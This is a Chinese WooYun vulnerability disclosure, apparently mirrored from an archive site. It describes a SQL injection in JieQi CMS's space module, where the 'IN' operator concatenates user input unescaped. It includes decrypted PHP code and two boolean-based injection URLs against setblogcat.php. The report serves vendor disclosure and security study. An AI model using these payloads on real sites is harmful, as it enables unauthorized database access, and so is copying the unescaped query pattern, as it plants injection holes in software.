乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-25: 细节已通知厂商并且等待厂商处理中 2013-11-25: 厂商已经确认,细节仅向厂商公开 2013-11-28: 细节向第三方安全合作伙伴开放 2014-01-19: 细节向核心白帽子及相关领域专家公开 2014-01-29: 细节向普通白帽子公开 2014-02-08: 细节向实习白帽子公开 2014-02-23: 细节向公众公开
杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。
class criteria extends criteriaelement{ var $column; //字段 var $operator; //分隔符 var $value; //值 function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" ) { $this->column = $_obfuscate_eZJe9OBy; $this->value = $_obfuscate_VgKtFeg; $this->operator = $_obfuscate_JChWBNMCFOA; } function render( ) { if ( !empty( $this->column ) ) { $_obfuscate_yHkENun4 = $this->column." ".$this->operator;.................................. if ( isset( $this->value ) ).................................. //当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。 if ( strtoupper( $this->operator ) == "IN" ) { $_obfuscate_yHkENun4 .= " ".$this->value; return $_obfuscate_yHkENun4; }//引入单引号 $_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'"; } return $_obfuscate_yHkENun4;------------------------------------------------------------------------------------------switch ( $_REQUEST[action] ){case "do_edit" : include_once( $jieqiModules['space']['path']."/class/blogcat.php" ); $blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" ); if ( $_REQUEST['delete_checkbox'] ) { $tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")"; $criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in () $criteria->add( new criteria( "`uid`", $uid ) ); $criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) ); $criteria->add( new criteria( "`default_cat`", 1, "!=" ) ); $blog_cat_handler->queryobjects( $criteria ); $v = $blog_cat_handler->getobject( ); if ( !empty( $v ) ) { $num = $v->getvar( "num" ); $blog_cat_handler->delete( $criteria ); unset( $criteria ); }
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23
危害等级:中
漏洞Rank:10
确认时间:2013-11-25 18:29
由于对用户提交变量过滤不严产生的漏洞。本漏洞来自JIEQI CMS 1.6版本。1.7及以上版本默认无space模块,如果有,则是个人私自整合行为。
暂无